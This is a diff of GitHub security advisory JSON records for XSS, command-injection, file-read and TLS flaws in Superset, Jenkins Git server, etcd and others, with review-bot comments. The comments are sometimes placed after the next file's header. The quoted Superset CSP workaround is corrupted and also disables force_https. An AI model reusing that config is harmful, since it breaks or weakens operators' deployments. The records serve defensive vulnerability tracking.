[ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.6.0" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/apollographql/apollo-client-nextjs/security/advisories/GHSA-rv8p-rr2h-fgpg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23841" + }, + { + "type": "WEB", + "url": "https://github.com/apollographql/apollo-client-nextjs/commit/b92bc42abd5f8e17d4db361c36bd08e4f541a46b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apollographql/apollo-client-nextjs" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-80" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:45Z", + "nvd_published_at": "2024-01-30T18:15:48Z" + 
} +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json b/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json index e02eb7065b78a..78dd3517ed592 100644 --- a/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json +++ b/advisories/github-reviewed/2024/01/GHSA-rwhh-6x83-84v6/GHSA-rwhh-6x83-84v6.json 
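Review bot: The `details` text names the package as `@apollo/experimental-apollo-client-nextjs`, while `summary` and `affected[].package.name` use `@apollo/experimental-nextjs-app-support`; since the affected entry is what matching keys on, the details wording is presumably the stale one and should be aligned, e.g. `The @apollo/experimental-nextjs-app-support NPM package is vulnerable ...`. The range (`fixed: "0.7.0"`) and `last_known_affected_version_range: "<= 0.6.0"` are consistent with each other and with the Patches section. The `C:H/I:L` vector for a server-side-rendering XSS is plausible but, as elsewhere in this change, the source of the score (vendor vs NVD) is not recorded.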
@@ -1,13 +1,13 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-rwhh-6x83-84v6",
- "modified": "2024-01-23T21:35:07Z",
+ "modified": "2024-01-29T19:12:33Z",
 "published": "2024-01-23T15:30:58Z",
 "aliases": [
 "CVE-2023-49657"
 ],
 "summary": "Cross-site Scripting in Apache superset",
- "details": "A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS.\n\nFor 2.X versions, users should change their config to include:\n\nTALISMAN_CONFIG = {\n    \"content_security_policy\": {\n        \"base-uri\": [\"'self'\"],\n        \"default-src\": [\"'self'\"],\n        \"img-src\": [\"'self'\", \"blob:\", \"data:\"],\n        \"worker-src\": [\"'self'\", \"blob:\"],\n        \"connect-src\": [\n            \"'self'\",\n            \" https://api.mapbox.com\" https://api.mapbox.com\" ;,\n            \" https://events.mapbox.com\" https://events.mapbox.com\" ;,\n        ],\n        \"object-src\": \"'none'\",\n        \"style-src\": [\n            \"'self'\",\n            \"'unsafe-inline'\",\n        ],\n        \"script-src\": [\"'self'\", \"'strict-dynamic'\"],\n    },\n    \"content_security_policy_nonce_in\": [\"script-src\"],\n    \"force_https\": False,\n    \"session_cookie_secure\": False,\n}\n\n",
+ "details": "A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS.\n\nFor 2.X versions, users should change their config to include:\n\nTALISMAN_CONFIG = {\n    \"content_security_policy\": {\n        \"base-uri\": [\"'self'\"],\n        \"default-src\": [\"'self'\"],\n        \"img-src\": [\"'self'\", \"blob:\", \"data:\"],\n        \"worker-src\": [\"'self'\", \"blob:\"],\n        \"connect-src\": [\n            \"'self'\",\n            \" https://api.mapbox.com\" https://api.mapbox.com\" ;,\n            \" https://events.mapbox.com\" https://events.mapbox.com\" ;,\n        ],\n        \"object-src\": \"'none'\",\n        \"style-src\": [\n            \"'self'\",\n            \"'unsafe-inline'\",\n        ],\n        \"script-src\": [\"'self'\", \"'strict-dynamic'\"],\n    },\n    \"content_security_policy_nonce_in\": [\"script-src\"],\n    \"force_https\": False,\n    \"session_cookie_secure\": False,\n}",
 "severity": [
 {
 "type": "CVSS_V3",
diff --git a/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json b/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json
index 67445803e2bd4..187291619c777 100644
--- a/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json
+++ b/advisories/github-reviewed/2024/01/GHSA-rxpw-85vw-fx87/GHSA-rxpw-85vw-fx87.json
@@ -59,6 +59,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-401",
 "CWE-770"
 ],
 "severity": "MODERATE",
diff --git a/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json b/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json
index e4c52f7f7d38a..ee4188e23098f 100644
--- a/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json
+++ b/advisories/github-reviewed/2024/01/GHSA-v435-pfj6-68r3/GHSA-v435-pfj6-68r3.json
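Review bot: The new `details` value still carries the corrupted `connect-src` entries from the old one (`\" https://api.mapbox.com\" https://api.mapbox.com\" ;,` and the matching `events.mapbox.com` line): each URL appears twice with stray quotes and a `;`, so the quoted TALISMAN_CONFIG workaround is not valid Python and an operator pasting it into their Superset config gets a syntax error instead of the intended CSP. The upstream advisory presumably listed `\"https://api.mapbox.com\",` and `\"https://events.mapbox.com\",` once each; this hunk only trims the trailing `\n\n`, so the snippet should be re-checked against the Apache text before the record is republished. Note also that the snippet sets `force_https` and `session_cookie_secure` to `False`; operators already serving over TLS should keep their existing values rather than copy those two lines verbatim.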
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v435-pfj6-68r3",
- "modified": "2024-01-23T20:11:19Z",
+ "modified": "2024-01-29T19:12:43Z",
 "published": "2024-01-23T18:31:11Z",
 "aliases": [
 "CVE-2024-22496"
@@ -9,7 +9,10 @@
 "summary": "Cross-site Scripting in JFinal",
 "details": "Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the /admin/login username parameter.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 {
diff --git a/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json b/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json
index cb20fa9ee9d1a..7b136805771f6 100644
--- a/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json
+++ b/advisories/github-reviewed/2024/01/GHSA-v4xv-795h-rv4h/GHSA-v4xv-795h-rv4h.json
@@ -92,6 +92,10 @@
 {
 "type": "PACKAGE",
 "url": "https://github.com/nautobot/nautobot"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pypa/advisory-database/tree/main/vulns/nautobot/PYSEC-2024-16.yaml"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2024/01/GHSA-v5gq-qvjq-8p53/GHSA-v5gq-qvjq-8p53.json b/advisories/github-reviewed/2024/01/GHSA-v5gq-qvjq-8p53/GHSA-v5gq-qvjq-8p53.json
new file mode 100644
index 0000000000000..096f188bb86ea
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-v5gq-qvjq-8p53/GHSA-v5gq-qvjq-8p53.json
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v5gq-qvjq-8p53", + "modified": "2024-01-31T23:28:40Z", + "published": "2024-01-31T23:28:40Z", + "aliases": [ + "CVE-2018-12099" + ], + "summary": "Grafana Cross-site Scripting (XSS)", + "details": "Grafana before 5.2.0-beta1 has XSS vulnerabilities in dashboard links.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12099" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/11813" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/releases/tag/v5.2.0-beta1" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20190416-0004/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:28:40Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-v89q-c273-3p42/GHSA-v89q-c273-3p42.json b/advisories/github-reviewed/2024/01/GHSA-v89q-c273-3p42/GHSA-v89q-c273-3p42.json new file mode 100644 index 0000000000000..d53cf9d7101d2 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-v89q-c273-3p42/GHSA-v89q-c273-3p42.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v89q-c273-3p42", + "modified": "2024-02-05T23:06:29Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-36259" + ], + "summary": "Craft CMS Audit Plugin Cross Site Scripting vulnerability", + "details": "Cross Site Scripting (XSS) vulnerability in Craft CMS Audit Plugin before version 3.0.2 allows attackers to execute arbitrary code during user creation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "superbig/craft-audit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36259" + }, + { + "type": "WEB", + "url": "https://github.com/sjelfull/craft-audit/pull/73" + }, + { + "type": "WEB", + "url": "https://github.com/sjelfull/craft-audit/commit/c2888aa48457f24696ac0a2ba4f54f39e5c672ed" + }, + { + "type": "PACKAGE", + "url": "https://github.com/sjelfull/craft-audit" + }, + { + "type": "WEB", + "url": "https://www.linkedin.com/pulse/threat-briefing-craftcms-amrcybersecurity-emi0e/?trackingId=E75GttWvQp6gfvPiJDDUBA%3D%3D" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:42:40Z", + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json b/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json index b9f1cd47f5220..b4478cd8cd661 100644 --- a/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json +++ b/advisories/github-reviewed/2024/01/GHSA-v9wr-2xrg-v7w8/GHSA-v9wr-2xrg-v7w8.json 
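Review bot: The LinkedIn reference URL carries a `trackingId=...` query parameter, which is per-visitor analytics state rather than part of the resource identifier; it makes the reference unstable and non-deduplicable across advisories. Strip it to `"url": "https://www.linkedin.com/pulse/threat-briefing-craftcms-amrcybersecurity-emi0e/"`. The package (`superbig/craft-audit`) and repository (`sjelfull/craft-audit`) names differ, which is presumably a vendor/author naming difference, but a reviewer confirming that the Packagist name resolves to the referenced repository would remove the doubt.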
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-v9wr-2xrg-v7w8",
- "modified": "2024-01-23T20:11:27Z",
+ "modified": "2024-01-30T16:11:44Z",
 "published": "2024-01-23T18:31:11Z",
 "aliases": [
 "CVE-2024-22490"
@@ -9,7 +9,10 @@
 "summary": "Cross-site Scripting in beetl-bbs",
 "details": "Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 {
diff --git a/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json b/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json
index 11dccbd57a32d..d3c0d8c483af8 100644
--- a/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json
+++ b/advisories/github-reviewed/2024/01/GHSA-vm5m-qmrx-fw8w/GHSA-vm5m-qmrx-fw8w.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-vm5m-qmrx-fw8w",
- "modified": "2024-01-24T21:01:04Z",
+ "modified": "2024-01-31T14:55:51Z",
 "published": "2024-01-24T15:30:30Z",
 "aliases": [
 "CVE-2023-50944"
@@ -9,7 +9,10 @@
 "summary": "Apache Airflow: Bypass permission verification to read code of other dags",
 "details": "Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access. This vulnerability is considered low since it requires an authenticated user to exploit it. Users are recommended to upgrade to version 2.8.1, which fixes this issue.\n",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 {
diff --git a/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json b/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json
index 307403fbbd831..95ab55a3765da 100644
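Review bot: In the GHSA-vm5m-qmrx-fw8w hunk the added vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N` scores 6.5 (Medium) with confidentiality High, while the unchanged `details` sentence says the issue "is considered low since it requires an authenticated user"; the `database_specific.severity` field that should agree with the vector lies outside this hunk and is not touched. Either the vendor's rating or NVD's is being adopted here; a short commit-message note saying which would prevent a later inconsistent severity bump. The beetl-bbs hunk on the same line adds a standard reflected-XSS vector and needs no change.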
--- a/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json +++ b/advisories/github-reviewed/2024/01/GHSA-vph5-2q33-7r9h/GHSA-vph5-2q33-7r9h.json 
@@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vph5-2q33-7r9h", - "modified": "2024-01-24T21:45:58Z", + "modified": "2024-01-31T21:45:31Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23899" ], "summary": "Arbitrary file read vulnerability in Git server Plugin can lead to RCE", - "details": "Jenkins Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing attackers with Overall/Read permission to read content from arbitrary files on the Jenkins controller file system.", + "details": "Jenkins Git server Plugin uses the [args4j](https://github.com/kohsuke/args4j) library to parse command arguments and options on the Jenkins controller when processing Git commands received via SSH. This command parser has a feature that replaces an @ character followed by a file path in an argument with the file’s contents (`expandAtFiles`). This feature is enabled by default and Git server Plugin 99.va_0826a_b_cdfa_d and earlier does not disable it.\n\nThis allows attackers with Overall/Read permission to read the first two lines of arbitrary files on the Jenkins controller file system using the default character encoding of the Jenkins controller process.\n\nSee [SECURITY-3314](https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314) for further information about the potential impact of being able to read files on the Jenkins controller, as well as the [limitations for reading binary files](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note). 
Note that for this issue, unlike SECURITY-3314, attackers need Overall/Read permission.\n\n## Fix Description\nGit server Plugin 99.101.v720e86326c09 disables the command parser feature that replaces an @ character followed by a file path in an argument with the file’s contents for CLI commands.\n\n## Workaround\nNavigate to Manage Jenkins » Security and ensure that the SSHD Port setting in the SSH Server section is set to Disable. This disables access to Git repositories hosted by Jenkins (and the Jenkins CLI) via SSH.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { @@ -41,6 +44,10 @@ "type": "WEB", "url": "https://github.com/jenkinsci/git-server-plugin/commit/068ac7cc2574882ef9f5a486e001228a71d881ad" }, + { + "type": "PACKAGE", + "url": "https://github.com/jenkinsci/git-server-plugin" + }, { "type": "WEB", "url": "https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3319" diff --git a/advisories/github-reviewed/2024/01/GHSA-vvh2-82c7-ppfg/GHSA-vvh2-82c7-ppfg.json b/advisories/github-reviewed/2024/01/GHSA-vvh2-82c7-ppfg/GHSA-vvh2-82c7-ppfg.json new file mode 100644 index 0000000000000..01ddc6c0178f1 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-vvh2-82c7-ppfg/GHSA-vvh2-82c7-ppfg.json 
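Review bot: The added vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H` (8.8) asserts high integrity and availability impact, whereas the new `details` describe reading the first two lines of arbitrary files and defer the escalation argument to the linked SECURITY-3314 note; the summary's "can lead to RCE" is the only visible justification. If the score comes from NVD rather than from the Jenkins advisory, record that in the commit message so the `I:H/A:H` rating is not later "corrected" to a read-only vector. The rewritten text is otherwise a clear improvement: it names the parser feature (`expandAtFiles`), the fixed version, and a concrete workaround (disabling the SSHD port), which is what a defender needs to assess exposure.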
@@ -0,0 +1,77 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vvh2-82c7-ppfg", + "modified": "2024-01-30T18:43:05Z", + "published": "2024-01-30T06:30:23Z", + "aliases": [ + "CVE-2024-21488" + ], + "summary": "network Arbitrary Command Injection vulnerability", + "details": "Versions of the package network before 0.7.0 are vulnerable to Arbitrary Command Injection due to use of the `child_process` exec function without input sanitization. If (attacker-controlled) user input is given to the `mac_address_for` function of the package, it is possible for an attacker to execute arbitrary commands on the operating system that this package is being run on.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "network" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21488" + }, + { + "type": "WEB", + "url": "https://github.com/tomas/network/commit/5599ed6d6ff1571a5ccadea775430c131f381de7" + }, + { + "type": "WEB", + "url": "https://github.com/tomas/network/commit/6ec8713580938ab4666df2f2d0f3399891ed2ad7" + }, + { + "type": "WEB", + "url": "https://github.com/tomas/network/commit/72c523265940fe279eb0050d441522628f8988e5" + }, + { + "type": "WEB", + "url": "https://gist.github.com/icemonster/282ab98fb68fc22aac7c576538f6369c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/tomas/network" + }, + { + "type": "WEB", + "url": "https://security.snyk.io/vuln/SNYK-JS-NETWORK-6184371" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:43:05Z", + "nvd_published_at": "2024-01-30T05:15:09Z" + } +} \ No newline at end of file 
diff --git a/advisories/github-reviewed/2024/01/GHSA-w9h2-px87-74vx/GHSA-w9h2-px87-74vx.json b/advisories/github-reviewed/2024/01/GHSA-w9h2-px87-74vx/GHSA-w9h2-px87-74vx.json
new file mode 100644
index 0000000000000..5ae6e98324ca0
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-w9h2-px87-74vx/GHSA-w9h2-px87-74vx.json
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w9h2-px87-74vx",
+ "modified": "2024-01-30T20:56:45Z",
+ "published": "2024-01-30T20:56:45Z",
+ "aliases": [
+ "CVE-2024-21649"
+ ],
+ "summary": "vantage6 remote code execution vulnerability",
+ "details": "### Impact\nAuthenticated users could inject code into algorithm environment variables\n\n### Workarounds\nNo ",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "PyPI",
+ "name": "vantage6"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "4.2.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-w9h2-px87-74vx"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21649"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/vantage6/vantage6/commit/eac19db737145d3ca987adf037a454fae0790ddd"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/vantage6/vantage6"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-94"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T20:56:45Z",
+ "nvd_published_at": "2024-01-30T16:15:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-wpxw-5xfm-x22v/GHSA-wpxw-5xfm-x22v.json b/advisories/github-reviewed/2024/01/GHSA-wpxw-5xfm-x22v/GHSA-wpxw-5xfm-x22v.json
new file mode 100644
index 0000000000000..57245b9775b98
--- /dev/null
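Review bot: The `details` value ends its Workarounds section with the bare fragment `No ` (trailing space) and the Impact section is a single clause without a terminal period, which reads as a truncated import of the upstream advisory rather than its full text. Re-sync from the linked GHSA-w9h2-px87-74vx advisory, or at least normalise the tail to `### Workarounds\nNone.` so markdown renderers do not show a dangling word. The `introduced: "0"` / `fixed: "4.2.0"` range and the referenced fix commit are otherwise consistent with each other.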
+++ b/advisories/github-reviewed/2024/01/GHSA-wpxw-5xfm-x22v/GHSA-wpxw-5xfm-x22v.json
@@ -0,0 +1,73 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wpxw-5xfm-x22v",
+ "modified": "2024-02-06T19:47:14Z",
+ "published": "2024-01-29T21:30:27Z",
+ "aliases": [
+ "CVE-2023-51842"
+ ],
+ "summary": "MeshCentral algorithm-downgrade issue",
+ "details": "An algorithm-downgrade issue was discovered in Ylianst MeshCentral 1.1.16.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "meshcentral"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.1.17"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51842"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Ylianst/MeshCentral/commit/a5efc5e899b8809293b297df045cff5ec0eb448b"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/Ylianst/MeshCentral"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Ylianst/MeshCentral/tree/master"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/Bug_MeshCentral.md"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51842.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-29T22:28:55Z",
+ "nvd_published_at": "2024-01-29T20:15:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-wr2v-9rpq-c35q/GHSA-wr2v-9rpq-c35q.json b/advisories/github-reviewed/2024/01/GHSA-wr2v-9rpq-c35q/GHSA-wr2v-9rpq-c35q.json
new file mode 100644
index 0000000000000..e80ec41d8bfb9
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-wr2v-9rpq-c35q/GHSA-wr2v-9rpq-c35q.json
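Review bot: `cwe_ids` is an empty array (with a whitespace-only `+` line inside it), although the summary and details classify the issue as an algorithm downgrade; CWE-757 (Selection of Less-Secure Algorithm During Negotiation) or CWE-326 (Inadequate Encryption Strength) are the natural candidates, to be confirmed against the referenced Cryptographic-Misuses write-up. The one-sentence `details` say nothing about which algorithm is downgraded or why the vector rates confidentiality High, so a defender cannot judge exposure from this record alone; a sentence summarising the referenced analysis would help. The `tree/master` reference duplicates the PACKAGE entry and can be dropped.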
@@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wr2v-9rpq-c35q", + "modified": "2024-01-31T00:21:56Z", + "published": "2024-01-31T00:21:56Z", + "aliases": [ + "CVE-2020-15136" + ], + "summary": "Etcd Gateway TLS authentication only applies to endpoints detected in DNS SRV records", + "details": "### Vulnerability type\nCryptography\n\n### Workarounds\nRefer to the [gateway documentation](https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md). The vulnerability was spotted due to unclear documentation of how the gateway handles endpoints validation.\n\n### Detail\nWhen starting a gateway, TLS authentication will only be attempted on endpoints identified in DNS SRV records for a given domain, which occurs in the discoverEndpoints function. No authentication is performed against endpoints provided in the --endpoints flag. The auditors has noted that appropriate documentation of this validation functionality plus deprecation of this misleading functionality is an acceptable path forward.\n \n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.4.9" + } + }, + { + "package": { + "ecosystem": "Go", + "name": "go.etcd.io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + 
"introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-wr2v-9rpq-c35q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15136" + }, + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/blob/master/Documentation/op-guide/gateway.md" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287", + "CWE-306" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:21:56Z", + "nvd_published_at": "2020-08-06T23:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-wr6v-9f75-vh2g/GHSA-wr6v-9f75-vh2g.json b/advisories/github-reviewed/2024/01/GHSA-wr6v-9f75-vh2g/GHSA-wr6v-9f75-vh2g.json new file mode 100644 index 0000000000000..b4af317e10143 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-wr6v-9f75-vh2g/GHSA-wr6v-9f75-vh2g.json 
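Review bot: `last_known_affected_version_range` is set only on the 3.4 range (`<= 3.4.9`) and not on the `0` → `3.3.23` range for the same module, so the two entries are documented inconsistently; either add `"last_known_affected_version_range": "<= 3.3.22"` to the second (if that is what the advisory supports) or drop it from the first. The gateway documentation and security-audit links in `details` and `references` point at `master`, which the etcd repository may have renamed since; pinning to a tag or commit keeps the workaround text reachable. The hunk begins on the previous line.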
@@ -0,0 +1,69 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wr6v-9f75-vh2g",
+ "modified": "2024-02-01T17:48:40Z",
+ "published": "2024-01-31T22:43:20Z",
+ "aliases": [
+ "CVE-2024-23653"
+ ],
+ "summary": "Buildkit's interactive containers API does not validate entitlements check",
